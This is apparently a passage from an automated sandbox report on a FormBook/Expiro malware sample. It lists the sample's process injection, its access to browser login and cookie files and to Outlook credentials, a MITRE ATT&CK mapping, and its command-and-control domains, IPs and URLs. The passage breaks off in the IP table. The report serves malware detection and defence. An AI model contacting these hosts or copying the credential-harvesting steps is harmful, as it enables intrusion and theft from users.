                Source: LbtMpScwNRqrVB.exe, 00000006.00000002.3896866146.00000000014E1000.00000002.00000001.00040000.00000000.sdmp, LbtMpScwNRqrVB.exe, 00000006.00000000.1603973747.00000000014E1000.00000002.00000001.00040000.00000000.sdmp, LbtMpScwNRqrVB.exe, 00000008.00000000.1750735039.00000000014D0000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: Progman
                Source: LbtMpScwNRqrVB.exe, 00000006.00000002.3896866146.00000000014E1000.00000002.00000001.00040000.00000000.sdmp, LbtMpScwNRqrVB.exe, 00000006.00000000.1603973747.00000000014E1000.00000002.00000001.00040000.00000000.sdmp, LbtMpScwNRqrVB.exe, 00000008.00000000.1750735039.00000000014D0000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: 0Program Manager
                Source: LbtMpScwNRqrVB.exe, 00000006.00000002.3896866146.00000000014E1000.00000002.00000001.00040000.00000000.sdmp, LbtMpScwNRqrVB.exe, 00000006.00000000.1603973747.00000000014E1000.00000002.00000001.00040000.00000000.sdmp, LbtMpScwNRqrVB.exe, 00000008.00000000.1750735039.00000000014D0000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: Progmanlock
                Source: C:\Users\user\Desktop\1SxKeB4u0c.exeCode function: 0_2_0042862B cpuid 0_2_0042862B
                Source: C:\Users\user\Desktop\1SxKeB4u0c.exeQueries volume information: C:\ VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\1SxKeB4u0c.exeCode function: 0_2_00434E87 GetSystemTimeAsFileTime,GetCurrentThreadId,GetCurrentProcessId,QueryPerformanceCounter,0_2_00434E87
                Source: C:\Users\user\Desktop\1SxKeB4u0c.exeCode function: 0_2_00441E06 GetUserNameW,0_2_00441E06
                Source: C:\Users\user\Desktop\1SxKeB4u0c.exeCode function: 0_2_00433F3A __lock,____lc_codepage_func,__getenv_helper_nolock,_free,_strlen,__malloc_crt,_strlen,__invoke_watson,_free,GetTimeZoneInformation,WideCharToMultiByte,WideCharToMultiByte,0_2_00433F3A
                Source: C:\Users\user\Desktop\1SxKeB4u0c.exeCode function: 0_2_004049A0 GetVersionExW,GetCurrentProcess,IsWow64Process,GetNativeSystemInfo,FreeLibrary,GetSystemInfo,GetSystemInfo,0_2_004049A0
                Source: 1SxKeB4u0c.exe, 00000000.00000003.1430895740.0000000000AD4000.00000004.00000020.00020000.00000000.sdmp, 1SxKeB4u0c.exe, 00000000.00000003.1431048103.0000000000B40000.00000004.00000020.00020000.00000000.sdmp, 1SxKeB4u0c.exe, 00000000.00000002.1454691196.0000000000B40000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: procmon.exe

                Stealing of Sensitive Information

                barindex
                Yara detected FormBook
                Source: Yara matchFile source: 3.2.svchost.exe.420000.0.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 3.2.svchost.exe.420000.0.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 00000003.00000002.1682840085.0000000000ED0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000007.00000002.3894297177.0000000003260000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000007.00000002.3897117965.0000000003740000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000008.00000002.3900036415.0000000005260000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000007.00000002.3897375687.0000000003790000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000003.00000002.1678896334.0000000000420000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000006.00000002.3897666427.0000000002B80000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000003.00000002.1683604299.0000000003600000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
                Tries to harvest and steal browser information (history, passwords, etc)
                Source: C:\Windows\SysWOW64\bitsadmin.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login DataJump to behavior
                Source: C:\Windows\SysWOW64\bitsadmin.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Local StateJump to behavior
                Source: C:\Windows\SysWOW64\bitsadmin.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\CookiesJump to behavior
                Source: C:\Windows\SysWOW64\bitsadmin.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web DataJump to behavior
                Source: C:\Windows\SysWOW64\bitsadmin.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\CookiesJump to behavior
                Source: C:\Windows\SysWOW64\bitsadmin.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local StateJump to behavior
                Source: C:\Windows\SysWOW64\bitsadmin.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login DataJump to behavior
                Source: C:\Windows\SysWOW64\bitsadmin.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\CookiesJump to behavior
                Tries to steal Mail credentials (via file / registry access)
                Source: C:\Windows\SysWOW64\bitsadmin.exeKey opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\Jump to behavior
                Source: 1SxKeB4u0c.exeBinary or memory string: WIN_81
                Source: 1SxKeB4u0c.exeBinary or memory string: WIN_XP
                Source: 1SxKeB4u0c.exeBinary or memory string: WIN_XPe
                Source: 1SxKeB4u0c.exeBinary or memory string: WIN_VISTA
                Source: 1SxKeB4u0c.exeBinary or memory string: WIN_7
                Source: 1SxKeB4u0c.exeBinary or memory string: WIN_8
                Source: 1SxKeB4u0c.exeBinary or memory string: %.3d%S%M%H%m%Y%jX86IA64X64WIN32_NTWIN_10WIN_2016WIN_81WIN_2012R2WIN_2012WIN_8WIN_2008R2WIN_7WIN_2008WIN_VISTAWIN_2003WIN_XPeWIN_XPInstallLanguageSYSTEM\CurrentControlSet\Control\Nls\LanguageSchemeLangIDControl Panel\Appearance3, 3, 14, 0USERPROFILEUSERDOMAINUSERDNSDOMAINGetSystemWow64DirectoryWSeDebugPrivilege:winapistdcallubyte

                Remote Access Functionality

                barindex
                Yara detected FormBook
                Source: Yara matchFile source: 3.2.svchost.exe.420000.0.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 3.2.svchost.exe.420000.0.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 00000003.00000002.1682840085.0000000000ED0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000007.00000002.3894297177.0000000003260000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000007.00000002.3897117965.0000000003740000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000008.00000002.3900036415.0000000005260000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000007.00000002.3897375687.0000000003790000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000003.00000002.1678896334.0000000000420000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000006.00000002.3897666427.0000000002B80000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000003.00000002.1683604299.0000000003600000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
                Source: C:\Users\user\Desktop\1SxKeB4u0c.exeCode function: 0_2_00476283 socket,WSAGetLastError,bind,listen,WSAGetLastError,closesocket,0_2_00476283
                Source: C:\Users\user\Desktop\1SxKeB4u0c.exeCode function: 0_2_00476747 socket,WSAGetLastError,bind,WSAGetLastError,closesocket,0_2_00476747

                Mitre Att&ck Matrix

                ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
                Gather Victim Identity InformationAcquire Infrastructure2
                Valid Accounts                		2
                Native API                		1
                DLL Side-Loading                		1
                Exploitation for Privilege Escalation                		1
                Disable or Modify Tools                		1
                OS Credential Dumping                		2
                System Time Discovery                		1
                Taint Shared Content                		1
                Archive Collected Data                		4
                Ingress Tool Transfer                		Exfiltration Over Other Network Medium1
                System Shutdown/Reboot
                CredentialsDomainsDefault Accounts2
                Service Execution                		2
                Valid Accounts                		1
                Abuse Elevation Control Mechanism                		1
                Deobfuscate/Decode Files or Information                		21
                Input Capture                		1
                Account Discovery                		Remote Desktop Protocol1
                Data from Local System                		1
                Encrypted Channel                		Exfiltration Over BluetoothNetwork Denial of Service
                Email AddressesDNS ServerDomain AccountsAt1
                Windows Service                		1
                DLL Side-Loading                		1
                Abuse Elevation Control Mechanism                		Security Account Manager2
                File and Directory Discovery                		SMB/Windows Admin Shares1
                Email Collection                		4
                Non-Application Layer Protocol                		Automated ExfiltrationData Encrypted for Impact
                Employee NamesVirtual Private ServerLocal AccountsCronLogin Hook2
                Valid Accounts                		4
                Obfuscated Files or Information                		NTDS126
                System Information Discovery                		Distributed Component Object Model21
                Input Capture                		4
                Application Layer Protocol                		Traffic DuplicationData Destruction
                Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon Script21
                Access Token Manipulation                		1
                Software Packing                		LSA Secrets261
                Security Software Discovery                		SSH3
                Clipboard Data                		Fallback ChannelsScheduled TransferData Encrypted for Impact
                Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC Scripts1
                Windows Service                		1
                Timestomp                		Cached Domain Credentials2
                Virtualization/Sandbox Evasion                		VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
                DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup Items412
                Process Injection                		1
                DLL Side-Loading                		DCSync3
                Process Discovery                		Windows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
                Network Trust DependenciesServerlessDrive-by CompromiseContainer Orchestration JobScheduled Task/JobScheduled Task/Job111
                Masquerading                		Proc Filesystem11
                Application Window Discovery                		Cloud ServicesCredential API HookingApplication Layer ProtocolExfiltration Over Alternative ProtocolDefacement
                Network TopologyMalvertisingExploit Public-Facing ApplicationCommand and Scripting InterpreterAtAt2
                Valid Accounts                		/etc/passwd and /etc/shadow1
                System Owner/User Discovery                		Direct Cloud VM ConnectionsData StagedWeb ProtocolsExfiltration Over Symmetric Encrypted Non-C2 ProtocolInternal Defacement
                IP AddressesCompromise InfrastructureSupply Chain CompromisePowerShellCronCron2
                Virtualization/Sandbox Evasion                		Network SniffingNetwork Service DiscoveryShared WebrootLocal Data StagingFile Transfer ProtocolsExfiltration Over Asymmetric Encrypted Non-C2 ProtocolExternal Defacement
                Network Security AppliancesDomainsCompromise Software Dependencies and Development ToolsAppleScriptLaunchdLaunchd21
                Access Token Manipulation                		Input CaptureSystem Network Connections DiscoverySoftware Deployment ToolsRemote Data StagingMail ProtocolsExfiltration Over Unencrypted Non-C2 ProtocolFirmware Corruption
                Gather Victim Org InformationDNS ServerCompromise Software Supply ChainWindows Command ShellScheduled TaskScheduled Task412
                Process Injection                		KeyloggingProcess DiscoveryTaint Shared ContentScreen CaptureDNSExfiltration Over Physical MediumResource Hijacking

                Behavior Graph

                Hide Legend

                Legend:

                • Process
                • Signature
                • Created File
                • DNS/IP Info
                • Is Dropped
                • Is Windows Process
                • Number of created Registry Values
                • Number of created Files
                • Visual Basic
                • Delphi
                • Java
                • .Net C# or VB.NET
                • C, C++ or other language
                • Is malicious
                • Internet
                behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1588634 Sample: 1SxKeB4u0c.exe Startdate: 11/01/2025 Architecture: WINDOWS Score: 100 40 www.soainsaat.xyz 2->40 42 www.duwixushx.xyz 2->42 44 16 other IPs or domains 2->44 56 Suricata IDS alerts for network traffic 2->56 58 Antivirus detection for URL or domain 2->58 60 Antivirus detection for dropped file 2->60 64 8 other signatures 2->64 10 1SxKeB4u0c.exe 3 2->10         started        15 alg.exe 2->15         started        17 armsvc.exe 2->17         started        signatures3 62 Performs DNS queries to domains with low reputation 42->62 process4 dnsIp5 46 ssbzmoy.biz 18.141.10.107, 49706, 80 AMAZON-02US United States 10->46 48 pywolwnvd.biz 54.244.188.177, 49705, 80 AMAZON-02US United States 10->48 34 C:\Windows\System32\alg.exe, PE32+ 10->34 dropped 36 C:\Windows\System32\AppVClient.exe, PE32+ 10->36 dropped 38 C:\Program Files (x86)\...\armsvc.exe, PE32 10->38 dropped 78 Binary is likely a compiled AutoIt script file 10->78 80 Tries to detect sandboxes and other dynamic analysis tools (process name or module or function) 10->80 82 Writes to foreign memory regions 10->82 88 4 other signatures 10->88 19 svchost.exe 10->19         started        84 Antivirus detection for dropped file 15->84 86 Machine Learning detection for dropped file 15->86 file6 signatures7 process8 signatures9 66 Maps a DLL or memory area into another process 19->66 22 LbtMpScwNRqrVB.exe 19->22 injected process10 signatures11 68 Found direct / indirect Syscall (likely to bypass EDR) 22->68 25 bitsadmin.exe 13 22->25         started        process12 signatures13 70 Tries to steal Mail credentials (via file / registry access) 25->70 72 Tries to harvest and steal browser information (history, passwords, etc) 25->72 74 Modifies the context of a thread in another process (thread injection) 25->74 76 3 other signatures 25->76 28 LbtMpScwNRqrVB.exe 25->28 injected 32 firefox.exe 25->32         started        process14 dnsIp15 50 www.amayavp.xyz 185.27.134.144, 49727, 49728, 49729 WILDCARD-ASWildcardUKLimitedGB United Kingdom 28->50 52 www.xcvbj.asia 149.88.81.190, 49717, 49718, 49719 SAIC-ASUS United States 28->52 54 6 other IPs or domains 28->54 90 Found direct / indirect Syscall (likely to bypass EDR) 28->90 signatures16

                Screenshots

                Thumbnails

                This section contains all screenshots as thumbnails, including those not shown in the slideshow.


                windows-stand

                Antivirus, Machine Learning and Genetic Malware Detection

                Initial Sample

                SourceDetectionScannerLabelLink
                1SxKeB4u0c.exe87%ReversingLabsWin32.Virus.Expiro
                1SxKeB4u0c.exe83%VirustotalBrowse
                1SxKeB4u0c.exe100%AviraW32/Infector.Gen
                1SxKeB4u0c.exe100%Joe Sandbox ML

                Dropped Files

                SourceDetectionScannerLabelLink
                C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe100%AviraW32/Infector.Gen
                C:\Windows\System32\AppVClient.exe100%AviraW32/Infector.Gen
                C:\Windows\System32\alg.exe100%AviraW32/Infector.Gen
                C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe100%Joe Sandbox ML
                C:\Windows\System32\AppVClient.exe100%Joe Sandbox ML
                C:\Windows\System32\alg.exe100%Joe Sandbox ML

                Unpacked PE Files

                No Antivirus matches

                Domains

                No Antivirus matches

                URLs

                SourceDetectionScannerLabelLink
                http://54.244.188.177/U100%Avira URL Cloudmalware
                http://server/get.asp0%Avira URL Cloudsafe
                http://www.nb-shenshi.buzz/xxr1/?3P=ZxaxIFQ&jNn=CTzPrZCB9Fii6KjQQmIrKOWCR/YsuH5VDwI2wO/wDVbWtCCaNtYNYtUcS5/lXeW122DeEWPiybvqXTX+KsM66l0nHsUGQdUfs4bd2jLDJzuKWSTJW9+MdVSz4bzmf2o9wQ==0%Avira URL Cloudsafe
                http://18.141.10.107/rosecbcswnrlukqt0%Avira URL Cloudsafe
                http://www.learnwithus.site0%Avira URL Cloudsafe
                http://www.xcvbj.asia/rq1s/?jNn=8hQq9qCyJ4Zif0saVOr0qkV3vmys7vn3Uoj6jh6BmUV+5nttWKyOk55u+nexa6w5x5vVR/Acbsni3tLbmGpF1bV5lTdIrZK4z5JaRyWkNAYPXYBCqbiI2n7IpSyVWea/Pg==&3P=ZxaxIFQ0%Avira URL Cloudsafe
                http://www.amayavp.xyz/d9ku/?jNn=oAmOaC9rLcmuYnVpEIiUFnJetHEZs2100%Avira URL Cloudmalware
                http://18.141.10.107/:0%Avira URL Cloudsafe
                http://www.vayui.top/vg0z/?jNn=75uk3ictCfC5d95jc9ErhxuZnXjbt/7lQbKW3bXizAnaAV7ibEnK2RjZpZGGD2cxunkBvA8A/q4ys0sLjHkTGqSKo7wbbDBvpzyjUmzrS97fS4i7YPii/B0AmEK1pqpQFw==&3P=ZxaxIFQ0%Avira URL Cloudsafe
                http://www.soainsaat.xyz/rum2/100%Avira URL Cloudmalware
                http://www.laohub10.net/sgdd/0%Avira URL Cloudsafe
                http://www.t91rl7.pro/jhb8/0%Avira URL Cloudsafe
                http://www.laohub10.net/sgdd/?jNn=n1rc2pzYlnLUqZJmqzqSU8jwiNDNG2kr4Asv9klFc/49ZVn3If5xE9SNYfvTzAEQBq2X9buCd1WXrrlhdqeZSiHxO15Gr8xk7hOHDVFXExJKBXBlW4uFPtlrZZXFJuvZOA==&3P=ZxaxIFQ0%Avira URL Cloudsafe
                http://www.vayui.top/vg0z/0%Avira URL Cloudsafe
                http://www.rgenerousrs.store/o362/0%Avira URL Cloudsafe
                http://18.141.10.107/rosecbcswnrlukq2524.4000%Avira URL Cloudsafe
                http://www.t91rl7.pro/jhb8/?jNn=0R31+Vq/Nm8msngZkniPPNslS216pvARFjw5y1poIV3xx1K38BT3Oq7zCSGYp4hHlG+YTfvzleF+eXVetOmv0JB40X+6ZYpMJWzP2nxEXACS3GxK9okeiaSzZusyrXZl7w==&3P=ZxaxIFQ0%Avira URL Cloudsafe
                http://www.learnwithus.site/alu5/0%Avira URL Cloudsafe
                http://18.141.10.107/rosecbcswnrlukq0%Avira URL Cloudsafe
                http://www.xcvbj.asia/rq1s/0%Avira URL Cloudsafe
                http://54.244.188.177/L100%Avira URL Cloudmalware
                http://www.amayavp.xyz/d9ku/?jNn=oAmOaC9rLcmuYnVpEIiUFnJetHEZs2+IPEF+P87/UiJAxykznzqhXWsXbleaaytX5cXBA3Pvgu1YuM8etO94K9aiv+zbDkEKhMSDsVMvwPhhINhuEU9ODct9Lj1wj6urmQ==&3P=ZxaxIFQ100%Avira URL Cloudmalware
                http://www.amayavp.xyz/d9ku/100%Avira URL Cloudmalware
                http://www.rgenerousrs.store/o362/?3P=ZxaxIFQ&jNn=FaNItuPk5TcZ9HdRFxGis99OVV5mBzvNwqypTl8+VCtQ49ZNgIXGwO2PY0xc/TpBxHoMd3n/rLst/5dAk+rqD1uW41+CEwYhbzlB+9nxdj867jKwdHPO1yv4Ykeg9vUq/A==0%Avira URL Cloudsafe
                http://18.141.10.107:80/rosecbcswnrlukqp0%Avira URL Cloudsafe

                Domains and IPs

                Contacted Domains

                NameIPActiveMaliciousAntivirus DetectionReputation
                www.vayui.top
                		104.21.95.160
                		truefalse
                  		high
                  www.amayavp.xyz
                  		185.27.134.144
                  		truefalse
                    		high
                    ssbzmoy.biz
                    		18.141.10.107
                    		truefalse
                      		high
                      www.7vh2wy.top
                      		20.2.249.7
                      		truetrue
                        		unknown
                        pywolwnvd.biz
                        		54.244.188.177
                        		truefalse
                          		high
                          r0lqcud7.nbnnn.xyz
                          		23.225.160.132
                          		truefalse
                            		high
                            www.xcvbj.asia
                            		149.88.81.190
                            		truefalse
                              		high
                              www.duwixushx.xyz
                              		156.251.17.224
                              		truefalse
                                		high
                                www.rafconstrutora.online
                                		104.21.48.1
                                		truefalse
                                  		high
                                  www.rgenerousrs.store
                                  		188.114.97.3
                                  		truefalse
                                    		high
                                    natroredirect.natrocdn.com
                                    		85.159.66.93
                                    		truefalse
                                      		high
                                      www.learnwithus.site
                                      		209.74.77.107
                                      		truefalse
                                        		high
                                        www.nb-shenshi.buzz
                                        		161.97.142.144
                                        		truefalse
                                          		high
                                          www.t91rl7.pro
                                          		154.88.22.101
                                          		truefalse
                                            		high
                                            www.cuthethoi.online
                                            		unknown
                                            		unknownfalse
                                              		unknown
                                              www.soainsaat.xyz
                                              		unknown
                                              		unknownfalse
                                                		high
                                                www.laohub10.net
                                                		unknown
                                                		unknownfalse
                                                  		high

                                                  Contacted URLs

                                                  NameMaliciousAntivirus DetectionReputation
                                                  http://www.soainsaat.xyz/rum2/true
                                                  • Avira URL Cloud: malware
                                                  		unknown
                                                  http://www.vayui.top/vg0z/?jNn=75uk3ictCfC5d95jc9ErhxuZnXjbt/7lQbKW3bXizAnaAV7ibEnK2RjZpZGGD2cxunkBvA8A/q4ys0sLjHkTGqSKo7wbbDBvpzyjUmzrS97fS4i7YPii/B0AmEK1pqpQFw==&3P=ZxaxIFQtrue
                                                  • Avira URL Cloud: safe
                                                  		unknown
                                                  http://www.xcvbj.asia/rq1s/?jNn=8hQq9qCyJ4Zif0saVOr0qkV3vmys7vn3Uoj6jh6BmUV+5nttWKyOk55u+nexa6w5x5vVR/Acbsni3tLbmGpF1bV5lTdIrZK4z5JaRyWkNAYPXYBCqbiI2n7IpSyVWea/Pg==&3P=ZxaxIFQtrue
                                                  • Avira URL Cloud: safe
                                                  		unknown
                                                  http://www.nb-shenshi.buzz/xxr1/?3P=ZxaxIFQ&jNn=CTzPrZCB9Fii6KjQQmIrKOWCR/YsuH5VDwI2wO/wDVbWtCCaNtYNYtUcS5/lXeW122DeEWPiybvqXTX+KsM66l0nHsUGQdUfs4bd2jLDJzuKWSTJW9+MdVSz4bzmf2o9wQ==true
                                                  • Avira URL Cloud: safe
                                                  		unknown
                                                  http://pywolwnvd.biz/gprpendvhdrdevgdfalse
                                                    		high
                                                    http://www.laohub10.net/sgdd/?jNn=n1rc2pzYlnLUqZJmqzqSU8jwiNDNG2kr4Asv9klFc/49ZVn3If5xE9SNYfvTzAEQBq2X9buCd1WXrrlhdqeZSiHxO15Gr8xk7hOHDVFXExJKBXBlW4uFPtlrZZXFJuvZOA==&3P=ZxaxIFQtrue
                                                    • Avira URL Cloud: safe
                                                    		unknown
                                                    http://www.laohub10.net/sgdd/true
                                                    • Avira URL Cloud: safe
                                                    		unknown
                                                    http://www.vayui.top/vg0z/true
                                                    • Avira URL Cloud: safe
                                                    		unknown
                                                    http://www.t91rl7.pro/jhb8/true
                                                    • Avira URL Cloud: safe
                                                    		unknown
                                                    http://www.rgenerousrs.store/o362/true
                                                    • Avira URL Cloud: safe
                                                    		unknown
                                                    http://www.t91rl7.pro/jhb8/?jNn=0R31+Vq/Nm8msngZkniPPNslS216pvARFjw5y1poIV3xx1K38BT3Oq7zCSGYp4hHlG+YTfvzleF+eXVetOmv0JB40X+6ZYpMJWzP2nxEXACS3GxK9okeiaSzZusyrXZl7w==&3P=ZxaxIFQtrue
                                                    • Avira URL Cloud: safe
                                                    		unknown
                                                    http://ssbzmoy.biz/rosecbcswnrlukqfalse
                                                      		high
                                                      http://www.xcvbj.asia/rq1s/true
                                                      • Avira URL Cloud: safe
                                                      		unknown
                                                      http://www.rgenerousrs.store/o362/?3P=ZxaxIFQ&jNn=FaNItuPk5TcZ9HdRFxGis99OVV5mBzvNwqypTl8+VCtQ49ZNgIXGwO2PY0xc/TpBxHoMd3n/rLst/5dAk+rqD1uW41+CEwYhbzlB+9nxdj867jKwdHPO1yv4Ykeg9vUq/A==true
                                                      • Avira URL Cloud: safe
                                                      		unknown
                                                      http://www.amayavp.xyz/d9ku/true
                                                      • Avira URL Cloud: malware
                                                      		unknown
                                                      http://www.amayavp.xyz/d9ku/?jNn=oAmOaC9rLcmuYnVpEIiUFnJetHEZs2+IPEF+P87/UiJAxykznzqhXWsXbleaaytX5cXBA3Pvgu1YuM8etO94K9aiv+zbDkEKhMSDsVMvwPhhINhuEU9ODct9Lj1wj6urmQ==&3P=ZxaxIFQtrue
                                                      • Avira URL Cloud: malware
                                                      		unknown

                                                      URLs from Memory and Binaries

                                                      NameSourceMaliciousAntivirus DetectionReputation
                                                      https://duckduckgo.com/chrome_newtabbitsadmin.exe, 00000007.00000003.1874225056.00000000084F8000.00000004.00000020.00020000.00000000.sdmpfalse
                                                        		high
                                                        http://54.244.188.177/U1SxKeB4u0c.exe, 00000000.00000002.1454499072.0000000000AA1000.00000004.00000020.00020000.00000000.sdmpfalse
                                                        • Avira URL Cloud: malware
                                                        		unknown
                                                        https://duckduckgo.com/ac/?q=bitsadmin.exe, 00000007.00000003.1874225056.00000000084F8000.00000004.00000020.00020000.00000000.sdmpfalse
                                                          		high
                                                          https://www.google.com/images/branding/product/ico/googleg_lodp.icobitsadmin.exe, 00000007.00000003.1874225056.00000000084F8000.00000004.00000020.00020000.00000000.sdmpfalse
                                                            		high
                                                            http://server/get.aspsvchost.exe, 00000003.00000003.1647360528.0000000000848000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000003.00000003.1647240452.000000000081A000.00000004.00000020.00020000.00000000.sdmp, LbtMpScwNRqrVB.exe, 00000006.00000002.3895903417.0000000000E88000.00000004.00000020.00020000.00000000.sdmpfalse
                                                            • Avira URL Cloud: safe
                                                            		unknown
                                                            http://pywolwnvd.biz/1SxKeB4u0c.exe, 00000000.00000002.1454333051.0000000000A48000.00000004.00000020.00020000.00000000.sdmpfalse
                                                              		high
                                                              http://www.amayavp.xyz/d9ku/?jNn=oAmOaC9rLcmuYnVpEIiUFnJetHEZs2bitsadmin.exe, 00000007.00000002.3901034912.0000000006970000.00000004.00000800.00020000.00000000.sdmp, bitsadmin.exe, 00000007.00000002.3899231858.00000000049CC000.00000004.10000000.00040000.00000000.sdmp, LbtMpScwNRqrVB.exe, 00000008.00000002.3898161129.000000000385C000.00000004.00000001.00040000.00000000.sdmpfalse
                                                              • Avira URL Cloud: malware
                                                              		unknown
                                                              http://18.141.10.107/rosecbcswnrlukqt1SxKeB4u0c.exe, 00000000.00000002.1454763210.0000000000BEF000.00000004.00000020.00020000.00000000.sdmpfalse
                                                              • Avira URL Cloud: safe
                                                              		unknown
                                                              https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=bitsadmin.exe, 00000007.00000003.1874225056.00000000084F8000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                		high
                                                                https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=bitsadmin.exe, 00000007.00000003.1874225056.00000000084F8000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                  		high
                                                                  http://www.learnwithus.siteLbtMpScwNRqrVB.exe, 00000008.00000002.3900036415.00000000052BB000.00000040.80000000.00040000.00000000.sdmpfalse
                                                                  • Avira URL Cloud: safe
                                                                  		unknown
                                                                  https://www.ecosia.org/newtab/bitsadmin.exe, 00000007.00000003.1874225056.00000000084F8000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                    		high
                                                                    http://18.141.10.107/:1SxKeB4u0c.exe, 00000000.00000002.1454499072.0000000000AA1000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                    • Avira URL Cloud: safe
                                                                    		unknown
                                                                    http://18.141.10.107/1SxKeB4u0c.exe, 1SxKeB4u0c.exe, 00000000.00000002.1454454014.0000000000A88000.00000040.00000020.00020000.00000000.sdmp, 1SxKeB4u0c.exe, 00000000.00000002.1454499072.0000000000AA1000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                      		high
                                                                      https://ac.ecosia.org/autocomplete?q=bitsadmin.exe, 00000007.00000003.1874225056.00000000084F8000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                        		high
                                                                        http://18.141.10.107/rosecbcswnrlukq2524.4001SxKeB4u0c.exe, 00000000.00000002.1454499072.0000000000AAA000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                        • Avira URL Cloud: safe
                                                                        		unknown
                                                                        https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/searchbitsadmin.exe, 00000007.00000003.1874225056.00000000084F8000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                          		high
                                                                          http://www.learnwithus.site/alu5/LbtMpScwNRqrVB.exe, 00000008.00000002.3900036415.00000000052BB000.00000040.80000000.00040000.00000000.sdmpfalse
                                                                          • Avira URL Cloud: safe
                                                                          		unknown
                                                                          http://18.141.10.107/rosecbcswnrlukq1SxKeB4u0c.exe, 00000000.00000002.1454763210.0000000000BEF000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                          • Avira URL Cloud: safe
                                                                          		unknown
                                                                          https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=bitsadmin.exe, 00000007.00000003.1874225056.00000000084F8000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                            		high
                                                                            http://54.244.188.177/L1SxKeB4u0c.exe, 00000000.00000002.1454499072.0000000000AA1000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                            • Avira URL Cloud: malware
                                                                            		unknown
                                                                            http://18.141.10.107:80/rosecbcswnrlukqp1SxKeB4u0c.exe, 00000000.00000002.1454499072.0000000000ABA000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                            • Avira URL Cloud: safe
                                                                            		unknown

                                                                            World Map of Contacted IPs

                                                                            • No. of IPs < 25%
                                                                            • 25% < No. of IPs < 50%
                                                                            • 50% < No. of IPs < 75%
                                                                            • 75% < No. of IPs

                                                                            Public IPs

                                                                            IPDomainCountryFlagASNASN NameMalicious
                                                                            149.88.81.190
                                                                            		www.xcvbj.asiaUnited States
                                                                            		188SAIC-ASUSfalse
                                                                            161.97.142.144
                                                                            		www.nb-shenshi.buzzUnited States
                                                                            		51167CONTABODEfalse
                                                                            188.114.97.3
                                                                            		www.rgenerousrs.storeEuropean Union
                                                                            		13335CLOUDFLARENETUSfalse
                                                                            185.27.134.144
                                                                            		www.amayavp.xyzUnited Kingdom
                                                                            		34119WILDCARD-ASWildcardUKLimitedGBfalse
                                                                            154.88.22.101
                                                                            		www.t91rl7.proSeychelles
                                                                            		40065CNSERVERSUSfalse
                                                                            54.244.188.177
                                                                            		pywolwnvd.bizUnited States
                                                                            		16509AMAZON-02USfalse
                                                                            23.225.160.132
